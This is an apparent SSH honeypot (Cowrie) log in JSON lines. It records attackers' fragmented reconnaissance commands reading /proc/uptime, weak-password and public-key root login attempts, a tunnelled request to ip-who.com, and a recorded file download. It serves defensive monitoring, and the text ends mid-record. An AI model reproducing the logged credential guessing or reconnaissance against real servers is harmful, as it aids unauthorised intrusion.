{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T21:06:48.292144Z","src_ip":"212.227.235.229","session":"609190e92895"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T21:06:48.292775Z","src_ip":"212.227.235.229","session":"609190e92895"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T21:06:48.293581Z","src_ip":"212.227.235.229","session":"609190e92895"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T21:06:48.294634Z","src_ip":"212.227.235.229","session":"609190e92895"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T21:06:48.295253Z","src_ip":"212.227.235.229","session":"609190e92895"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T21:06:48.295827Z","src_ip":"212.227.235.229","session":"609190e92895"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T21:06:48.296228Z","src_ip":"212.227.235.229","session":"609190e92895"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T21:06:48.296764Z","src_ip":"212.227.235.229","session":"609190e92895"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T21:06:48.297275Z","src_ip":"212.227.235.229","session":"609190e92895"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T21:06:50.305707Z","src_ip":"212.227.235.229","session":"609190e92895"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"2.0","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:06:50.306749Z","src_ip":"212.227.235.229","session":"609190e92895"}
{"eventid":"cowrie.session.closed","duration":"13.5","message":"Connection lost after 13.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:06:50.307772Z","src_ip":"212.227.235.229","session":"609190e92895"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57164,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f6f3af5b5d1","protocol":"ssh","message":"New connection: 212.227.235.229:57164 (1.2.3.4:22) [session: 2f6f3af5b5d1]","sensor":"my-vps","timestamp":"2025-08-26T21:06:54.936253Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:07:02.093249Z","src_ip":"212.227.235.229","session":"2f6f3af5b5d1"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:07:06.447449Z","src_ip":"212.227.235.229","session":"2f6f3af5b5d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43180,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b7dd34ea2f8","protocol":"ssh","message":"New connection: 212.227.235.229:43180 (1.2.3.4:22) [session: 1b7dd34ea2f8]","sensor":"my-vps","timestamp":"2025-08-26T21:07:07.308553Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:07:07.351069Z","src_ip":"212.227.235.229","session":"1b7dd34ea2f8"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:07:07.616305Z","src_ip":"212.227.235.229","session":"1b7dd34ea2f8"}
{"eventid":"cowrie.session.closed","duration":"53.5","message":"Connection lost after 53.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:07:07.724699Z","src_ip":"212.227.235.229","session":"94e1bc2143ee"}
{"eventid":"cowrie.login.failed","username":"bin","password":"bin","message":"login attempt [bin/bin] failed","sensor":"my-vps","timestamp":"2025-08-26T21:07:08.676330Z","src_ip":"212.227.235.229","session":"1b7dd34ea2f8"}
{"eventid":"cowrie.login.success","username":"root","password":"abcdefg","message":"login attempt [root/abcdefg] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:07:08.809931Z","src_ip":"212.227.235.229","session":"2f6f3af5b5d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T21:07:09.162856Z","session":"2f6f3af5b5d1"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:07:10.020619Z","src_ip":"212.227.235.229","session":"1b7dd34ea2f8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T21:07:10.681463Z","src_ip":"212.227.235.229","session":"2f6f3af5b5d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57484,"dst_ip":"1.2.3.4","dst_port":22,"session":"14f8547c2265","protocol":"ssh","message":"New connection: 212.227.235.229:57484 (1.2.3.4:22) [session: 14f8547c2265]","sensor":"my-vps","timestamp":"2025-08-26T21:07:10.697938Z"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":51424,"dst_ip":"1.2.3.4","dst_port":22,"session":"f16ebba112ec","protocol":"ssh","message":"New connection: 139.19.117.131:51424 (1.2.3.4:22) [session: f16ebba112ec]","sensor":"my-vps","timestamp":"2025-08-26T21:07:10.955845Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:07:10.956493Z","src_ip":"139.19.117.131","session":"f16ebba112ec"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T21:07:10.973004Z","src_ip":"139.19.117.131","session":"f16ebba112ec"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"ad:f6:e2:86:a7:a0:7c:78:07:8d:ea:eb:c0:ee:b1:53","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD0niuqhmdgATEUH9gaaxhnK9x8y9GopY1MxQe1VGWSps/MGb/ngvEu9DMVrnH/RcsnnPsV1Ncyjd/y4CdvFrR+OoNZquuVfAUbhOUO6up6GxtoObSV3V5lyepnJK5gzmxfelfmotxUzzwMYkgdsdeasVS4pqdASrivsFdG8kf59XG6VAD5j14uojZnLzVwvDs5usHFyS9QRr4pEfd670bO0TAbSQjf76eVwgQTMoQJaK1uHDkeVPuHhLXZtGPF2NVr1fTB3L8udxfQvw1A0OSLoKtYEXrDbiDKrJ+QINLvn8i98k2d+/EvDtM+BpuH8FTw3rC9VuY/IutOo0aY0mRXMn5A1L0x2YCfSavUH+zwf3qPLUW4rQNYxXoX5xzYafLsuYjfvhwYkO4OZb3teOU7vcFcYc1cgthdOtDfllMXmdOJKhMlwVB2xBx3UJyZQdqdOnFTxQ8i1j2li0ywKiARDFypqj+GNSBwpTKhYsWW699oSI79JD9r4tWfxyVyfAs=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint ad:f6:e2:86:a7:a0:7c:78:07:8d:ea:eb:c0:ee:b1:53","sensor":"my-vps","timestamp":"2025-08-26T21:07:11.008380Z","src_ip":"139.19.117.131","session":"f16ebba112ec"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"ad:f6:e2:86:a7:a0:7c:78:07:8d:ea:eb:c0:ee:b1:53","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD0niuqhmdgATEUH9gaaxhnK9x8y9GopY1MxQe1VGWSps/MGb/ngvEu9DMVrnH/RcsnnPsV1Ncyjd/y4CdvFrR+OoNZquuVfAUbhOUO6up6GxtoObSV3V5lyepnJK5gzmxfelfmotxUzzwMYkgdsdeasVS4pqdASrivsFdG8kf59XG6VAD5j14uojZnLzVwvDs5usHFyS9QRr4pEfd670bO0TAbSQjf76eVwgQTMoQJaK1uHDkeVPuHhLXZtGPF2NVr1fTB3L8udxfQvw1A0OSLoKtYEXrDbiDKrJ+QINLvn8i98k2d+/EvDtM+BpuH8FTw3rC9VuY/IutOo0aY0mRXMn5A1L0x2YCfSavUH+zwf3qPLUW4rQNYxXoX5xzYafLsuYjfvhwYkO4OZb3teOU7vcFcYc1cgthdOtDfllMXmdOJKhMlwVB2xBx3UJyZQdqdOnFTxQ8i1j2li0ywKiARDFypqj+GNSBwpTKhYsWW699oSI79JD9r4tWfxyVyfAs=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T21:07:11.009022Z","src_ip":"139.19.117.131","session":"f16ebba112ec"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"ad:f6:e2:86:a7:a0:7c:78:07:8d:ea:eb:c0:ee:b1:53","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD0niuqhmdgATEUH9gaaxhnK9x8y9GopY1MxQe1VGWSps/MGb/ngvEu9DMVrnH/RcsnnPsV1Ncyjd/y4CdvFrR+OoNZquuVfAUbhOUO6up6GxtoObSV3V5lyepnJK5gzmxfelfmotxUzzwMYkgdsdeasVS4pqdASrivsFdG8kf59XG6VAD5j14uojZnLzVwvDs5usHFyS9QRr4pEfd670bO0TAbSQjf76eVwgQTMoQJaK1uHDkeVPuHhLXZtGPF2NVr1fTB3L8udxfQvw1A0OSLoKtYEXrDbiDKrJ+QINLvn8i98k2d+/EvDtM+BpuH8FTw3rC9VuY/IutOo0aY0mRXMn5A1L0x2YCfSavUH+zwf3qPLUW4rQNYxXoX5xzYafLsuYjfvhwYkO4OZb3teOU7vcFcYc1cgthdOtDfllMXmdOJKhMlwVB2xBx3UJyZQdqdOnFTxQ8i1j2li0ywKiARDFypqj+GNSBwpTKhYsWW699oSI79JD9r4tWfxyVyfAs=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint ad:f6:e2:86:a7:a0:7c:78:07:8d:ea:eb:c0:ee:b1:53","sensor":"my-vps","timestamp":"2025-08-26T21:07:11.026386Z","src_ip":"139.19.117.131","session":"f16ebba112ec"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"ad:f6:e2:86:a7:a0:7c:78:07:8d:ea:eb:c0:ee:b1:53","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD0niuqhmdgATEUH9gaaxhnK9x8y9GopY1MxQe1VGWSps/MGb/ngvEu9DMVrnH/RcsnnPsV1Ncyjd/y4CdvFrR+OoNZquuVfAUbhOUO6up6GxtoObSV3V5lyepnJK5gzmxfelfmotxUzzwMYkgdsdeasVS4pqdASrivsFdG8kf59XG6VAD5j14uojZnLzVwvDs5usHFyS9QRr4pEfd670bO0TAbSQjf76eVwgQTMoQJaK1uHDkeVPuHhLXZtGPF2NVr1fTB3L8udxfQvw1A0OSLoKtYEXrDbiDKrJ+QINLvn8i98k2d+/EvDtM+BpuH8FTw3rC9VuY/IutOo0aY0mRXMn5A1L0x2YCfSavUH+zwf3qPLUW4rQNYxXoX5xzYafLsuYjfvhwYkO4OZb3teOU7vcFcYc1cgthdOtDfllMXmdOJKhMlwVB2xBx3UJyZQdqdOnFTxQ8i1j2li0ywKiARDFypqj+GNSBwpTKhYsWW699oSI79JD9r4tWfxyVyfAs=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T21:07:11.027473Z","src_ip":"139.19.117.131","session":"f16ebba112ec"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:07:11.395180Z","src_ip":"212.227.235.229","session":"14f8547c2265"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:07:11.395915Z","src_ip":"212.227.235.229","session":"14f8547c2265"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52536,"dst_ip":"1.2.3.4","dst_port":22,"session":"1bbf0b55d3a4","protocol":"ssh","message":"New connection: 212.227.235.229:52536 (1.2.3.4:22) [session: 1bbf0b55d3a4]","sensor":"my-vps","timestamp":"2025-08-26T21:07:13.973526Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:07:14.092827Z","src_ip":"212.227.235.229","session":"1bbf0b55d3a4"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: 